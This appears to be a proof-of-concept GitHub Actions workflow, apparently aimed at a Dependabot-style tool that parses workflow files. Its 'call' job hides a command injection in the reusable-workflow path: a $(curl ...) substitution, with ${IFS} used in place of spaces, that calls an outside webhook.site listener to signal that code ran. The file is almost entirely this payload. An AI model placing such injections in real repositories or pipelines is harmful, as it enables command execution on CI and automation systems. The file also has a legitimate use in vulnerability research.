name: ci
on: workflow_dispatch
jobs:
  control:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - uses: actions/setup-node@v3
  call:
    uses: "0hmdz/dependabot-poc-action/.github/workflows/x$(curl${IFS}https://webhook.site/8bac9a48-4c5d-474c-bf0c-03e9de77f2e4).yml@v1"
